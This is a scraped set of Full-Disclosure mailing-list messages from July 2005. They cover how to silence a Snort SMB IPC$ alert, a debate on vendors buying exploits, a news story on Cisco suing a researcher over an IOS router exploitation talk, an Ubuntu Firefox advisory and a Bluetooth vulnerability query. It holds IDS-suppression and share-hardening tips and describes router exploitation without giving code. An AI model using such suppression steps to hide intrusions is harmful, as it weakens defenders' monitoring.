Just because I know you haven't, I'm going to ask: have you tried a Snort users group? A Snort usenet group? *Anyone*??? Didn't think so... Or just RTFM right on the snort site. http://www.snort.org/docs/snort_htmanuals/htmanual_233/node18.html (there is a specific example addressing this EXACT issue) Sec: 3.2.3 IP Addresses Figure: Example IP Address Negation Rule" ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
How to stop this event ie not to detect for this event. plz tell me in brief note There are 2 major ways to do this ... 1) Start Snort with the '-o' switch and then duplicate the offending signature using the 'pass' directive for the IP you want to ignore. 2) use the negation operator (!) in the rule for the IP you want to ignore. BTW: this topic dosen't belong on full-disclosure. Try the snort-users list. Regards, Michael Holstein CISSP GCIA Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
On Thu, 28 Jul 2005 09:49:46 +0200, Christoph Gruber said: > Am Mittwoch, 27. Juli 2005 20:15 schrieb DAN MORRILL: > > > I could see CERT doing this, but not 3com. > > CERT is too close to US-Goverment CERT is more hobbled by their traditional "wait till *all* vendors have patches ready" stance than by any connection to the US .gov world. pgpa1fkT5D4qC.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] (Fwd) Cisco, ISS file suit against rogue researcher
[summary: this is not good news. ISS have cracked IOS, and Cisco is trying to suppress it. Which means, the bad guys have got the info to work with, but the good guys can't defend against it (since the info is "incomplete"). All we can say for now is that IOS is clearly vulnerable and this puts all Cisco routers at risk. The fact that Cisco are trying to suppress it suggests the threat is real. But due to the information vacuum created by Cisco's attempted suppression, it's not possible to suggest a workaround. For now, the best workaround is to avoid purchasing or using Cisco kit. What's the bet Cisco's big customers have got the inside track? Surely they couldn't deny the fault to the DOD. - Stu] --- Forwarded message follows --- http://www.securityfocus.com/news/11259 Cisco, ISS file suit against rogue researcher Robert Lemos, SecurityFocus 2005-07-27 LAS VEGAS--Networking giant Cisco and security company Internet Security Systems filed on Wednesday a restraining order against the management of the Black Hat Conference and a security expert who told conference attendees that attackers can broadly compromise Cisco routers. What politicians are talking about when they talk about the Digital Pearl Harbor is a network worm. That's what we could see in the future, if this isn't fixed. Michael Lynn, independent security researcher and discoverer of a reliable method for running code on Cisco routers The legal action followed a presentation by security researcher Michael Lynn, a former ISS employee, who brushed off threats of legal action and a broad effort to delete his presentation from conference materials to warn attendees that malicious programs could be run on Cisco routers. While the information had already been presented by Lynn, a Cisco spokesman said that the companies wanted to prevent further dissemination of inside information about Cisco's routers. "We don't want them to further discuss it," said Cisco spokesman John Noh. "This is about protecting our intellectual property." Three weeks of intense discussions between ISS, the researcher, Cisco, and conference management failed on Wednesday. Two days before, Cisco representatives spent eight hours ripping out the ten- page presentation from the conference book and ISS executives decided to pull the presentation, allowing researcher Lynn to speak on a different topic. In a dramatic reversal on Wednesday, Lynn told attendees he tendered his resignation to ISS less than two hours before he went on stage to present his findings, then proceeded to describe a reliable way to run programs by exploiting the Internet Operating System (IOS), the core software for Cisco routers. "I feel I had to do what's right for the country and the national infrastructure," he said. "It has been confirmed that bad people are working on this (compromising IOS). The right thing to do here is to make sure that everyone knows that it's vulnerable." A majority of the Internet infrastructure relies on Cisco networking hardware to route data from one computer to another. While security researchers have found flaws in the IOS router software in the past, almost all the vulnerabilities have only allowed an attacker to degrade communications in what is known as a denial-of-service attack. Lynn outlined a way to take control of an IOS-based router, using a buffer overflow or a heap overflow, two types of memory vulnerabilities. He demonstrated the attack using a vulnerability that Cisco fixed in April. While that flaw is patched, he stressed that the attack can be used with any new buffer overrun or heap overflow, adding that running code on a router is a serious threat. "When you attack a host machine, you gain control of that machine-- when you control a router, you gain control of the network," Lynn said. ISS disavowed any foreknowledge of Lynn's intent to resign and present his findings. Cisco condemned the talk in strong terms that suggested the company may initiate legal action against the researcher and the conference, describing the presentation as the illegal publication of proprietary material. "It is especially regretful, and indefensible, that the Black Hat Conference organizers have given Mr. Lynn a platform to publicly disseminate the information he illegally obtained," the company said in a statement. "We appreciate the cooperation we have received from ISS in this matter. We are working with ISS to continue our joint research in the area of security vulnerabilities." For his part, Black Hat Conference organizer and founder Jeff Moss denied that he had any idea of Lynn's intent. "He told me yesterday that he would do his backup presentation," Moss said after the controversial presentation. Moss said he had worked hard to address Cisco's concerns with the original presentation. "We were in the middle of trying to run a conference and lawyers from Cisco were talking about a temporary restraining order." The controversy is the lat
[Full-disclosure] [USN-149-3] Ubuntu 4.10 update for Firefox vulnerabilities
=== Ubuntu Security Notice USN-149-3 July 28, 2005 mozilla-firefox vulnerabilities CAN-2004-1156, CAN-2004-1381, CAN-2005-0141, CAN-2005-0142, CAN-2005-0143, CAN-2005-0144, CAN-2005-0145, CAN-2005-0146, CAN-2005-0147, CAN-2005-0150, CAN-2005-0230, CAN-2005-0231, CAN-2005-0232, CAN-2005-0233, CAN-2005-0255, CAN-2005-0399, CAN-2005-0401, CAN-2005-0402, CAN-2005-0578, CAN-2005-0584, CAN-2005-0585, CAN-2005-0586, CAN-2005-0587, CAN-2005-0588, CAN-2005-0589, CAN-2005-0590, CAN-2005-0591, CAN-2005-0592, CAN-2005-0593, CAN-2005-0752, CAN-2005-0989, CAN-2005-1153, CAN-2005-1154, CAN-2005-1155, CAN-2005-1156, CAN-2005-1157, CAN-2005-1158, CAN-2005-1159, CAN-2005-1160, CAN-2005-1531, CAN-2005-1532, CAN-2005-1937, CAN-2005-2260, CAN-2005-2261, CAN-2005-2262, CAN-2005-2263, CAN-2005-2264, CAN-2005-2265, CAN-2005-2266, CAN-2005-2267, CAN-2005-2268, CAN-2005-2269, CAN-2005-2270 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: mozilla-firefox mozilla-firefox-locale-ca mozilla-firefox-locale-de mozilla-firefox-locale-es mozilla-firefox-locale-fr mozilla-firefox-locale-it mozilla-firefox-locale-ja mozilla-firefox-locale-nb mozilla-firefox-locale-pl mozilla-firefox-locale-tr mozilla-firefox-locale-uk The problem can be corrected by upgrading the affected package to version 1.0.6-0ubuntu0.0.1 (mozilla-firefox) and 1.0.6-0ubuntu0.1 (mozilla-firefox-locale-... packages). Please note that the new version does not work with the already existing translation packages (mozilla-firefox-locale-...). New packages have been provided which are compatible to the new Firefox version of this security update, so they need to be upgraded as well (a standard system upgrade will take care of this). After a standard system upgrade you need to restart Firefox to effect the necessary changes. We apologize for the huge delay of this update; we changed our update strategy for Mozilla products to make sure that such long delays will not happen again. Details follow: USN-149-1 fixed some vulnerabilities in the Ubuntu 5.04 (Hoary Hedgehog) version of Firefox. The version shipped with Ubuntu 4.10 (Warty Warthog) is also vulnerable to these flaws, so it needs to be upgraded as well. Please see http://www.ubuntulinux.org/support/documentation/usn/usn-149-1 for the original advisory. This update also fixes several older vulnerabilities; Some of them could be exploited to execute arbitrary code with full user privileges if the user visited a malicious web site. (MFSA-2005-01 to MFSA-2005-44; please see the following web site for details: http://www.mozilla.org/projects/security/known-vulnerabilities.html) Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-ca/mozilla-firefox-locale-ca_1.0-0ubuntu0.1.dsc Size/MD5: 586 c6a4ba172beb50212cc8dd63cf53fe21 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-ca/mozilla-firefox-locale-ca_1.0-0ubuntu0.1.tar.gz Size/MD5: 413206 818b085a5c467e10da863e9d08d0fe20 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-de/mozilla-firefox-locale-de_1.0-0ubuntu0.1.dsc Size/MD5: 634 ce6ada2229be234d78b7a3ed9b51c6f7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-de/mozilla-firefox-locale-de_1.0-0ubuntu0.1.tar.gz Size/MD5: 378461 cf83507e00cbcbde71a983143c8b2d08 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-es/mozilla-firefox-locale-es_1.0-0ubuntu0.1.dsc Size/MD5: 601 0a97fd79d8862e5482e0d558e995c539 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-es/mozilla-firefox-locale-es_1.0-0ubuntu0.1.tar.gz Size/MD5:99717 8cbf0adeb41feb8d6b018608a962dab6 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-fr/mozilla-firefox-locale-fr_1.0-0ubuntu0.2.dsc Size/MD5: 578 b1568bcc4255541cee642fcf4f01b026 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-fr/mozilla-firefox-locale-fr_1.0-0ubuntu0.2.tar.gz Size/MD5: 411735 51e401a49e6622b063c5abc44c0338b4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-it/mozilla-firefox-locale-it_1.0-0ubuntu0.1.dsc Size/MD5: 623 77ab520968ac64c4ff032b9d1a348dbf http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-it/mozilla-firefox-locale-it_1.0-0ubuntu0.1.tar.gz Size/MD5: 378699 5dc1756e4e5177ca07bc0b89a53fb4b5 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-ja/mozilla-firefox-locale-ja_1.0-0ubuntu0.1.dsc Size/MD5: 612 b2858d47a7d517efe9fd16a4e8fd6435 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-firefox-locale-ja/mozilla-firefox-locale-ja_1.0-0ubuntu0.1.tar.gz Size/MD5: 169527 f580ce82d1768d
[Full-disclosure] Re: bluetooth devices list ?
http://www.mobibug.com/ Mark Sec <[EMAIL PROTECTED]> 27.07.2005 22:32 Please respond to Mark Sec <[EMAIL PROTECTED]> To pen-test@securityfocus.com, full-disclosure@lists.grok.org.uk, security-basics@securityfocus.com cc Subject bluetooth devices list ? Alo folks a) has anyone the last list about the vulnerables devices (mobile, devices, etc)under bluetooth ? something linke this: (the section "who´s vulnerable") http://www.thebunker.net/security/bluetooth.htm b) has anyone the best mail-lists, tools, links and research about the vulnerabilities about bluetooth? - Mark :-) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
Am Mittwoch, 27. Juli 2005 20:15 schrieb DAN MORRILL: > I could see CERT doing this, but not 3com. CERT is too close to US-Goverment -- Grisu 2B OR (NOT (2B)) = FF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
Am Mittwoch, 27. Juli 2005 15:15 schrieb Adam Jones: > What exactly is wrong with this? Lokk at this: http://www.red-database-security.com/advisory/published_alerts.html Alex informed Oracle immediatly of all vulns, and they did nothing. Me, as a security personal have to think that I am the only one in the world, who doesnt know about a vulnerabilty. > I personally would rather have 3com > buying up exploits (probably under an agreement for exclusive access) > instead of having them sold to the highest, probably malicious, > bidder. You trust 3Com? Me Not. > Even if someone sells it to both there is a more reputable > group that has the exploit and can help with mitigation. What makes you shure, that noone else finds it? -- Grisu 2B OR (NOT (2B)) = FF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
Hi, you can try: SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\AutoShareServer create a dword called AutoShareServer and set its value to 0 (for a server) OR AutoShareWks=0 (for workstations). It removes all $ (hidden) shares EXCEPT IPC$ (need reboot) net share ipc$ /delete (ie in: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) /JA * http://www.athias.fr - Alertes et bulletins de sécurité - Original Message - From: Ramachandrand To: full-disclosure@lists.grok.org.uk Sent: Thursday, July 28, 2005 9:16 AM Subject: [Full-disclosure] NETBIOS SMB IPC$ unicode share access Hi, AM NEW TO SNORT KINDLY HELP ME In my network all r 2000 & XP Pc in that all the users home folder was mapped as \\servername\username$ In server we use to create a folder and give access to the particular user. Recently we I have installed snort in that it keeps on alerting this msg NETBIOS SMB IPC$ unicode share access How to stop this event ie not to detect for this event. plz tell me in brief note Thanks in advance. Regards, D.Ramachandran ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Our Industry Is Seriously Ethics Impaired
J.A. Terranson wrote: A "reputable" company does not encourage the writing of malware for money, or the withholding of information from the community (FD) in exchange for mere personal gain. Does it follow that you regard *all* security researchers who release PoC exploit code as disreputable? \a -- Andrew Simmons Speaking for myself only __ This email has been scanned by the MessageLabs Email Security System. For more information please visit http://www.messagelabs.com/email __ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
On Thu, 28 Jul 2005, Ramachandrand wrote: > How to stop this event ie not to detect for this event. plz tell me in brief > note Welcome to Full Snort Assistance - N O T. Just because I know you haven't, I'm going to ask: have you tried a Snort users group? A Snort usenet group? *Anyone*??? Didn't think so... -- Yours, J.A. Terranson [EMAIL PROTECTED] 0xBD4A95BF "A stock broker is someone who handles your money until its all gone." Diana Hubbard (of Scientology fame) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NETBIOS SMB IPC$ unicode share access
> How to stop this event ie not to detect for this event. plz tell me in brief > note man snort ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] NETBIOS SMB IPC$ unicode share access
Hi, AM NEW TO SNORT KINDLY HELP ME In my network all r 2000 & XP Pc in that all the users home folder was mapped as \\servername\username$ In server we use to create a folder and give access to the particular user. Recently we I have installed snort in that it keeps on alerting this msg “ NETBIOS SMB IPC$ unicode share access” How to stop this event ie not to detect for this event. plz tell me in brief note Thanks in advance. Regards, D.Ramachandran ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/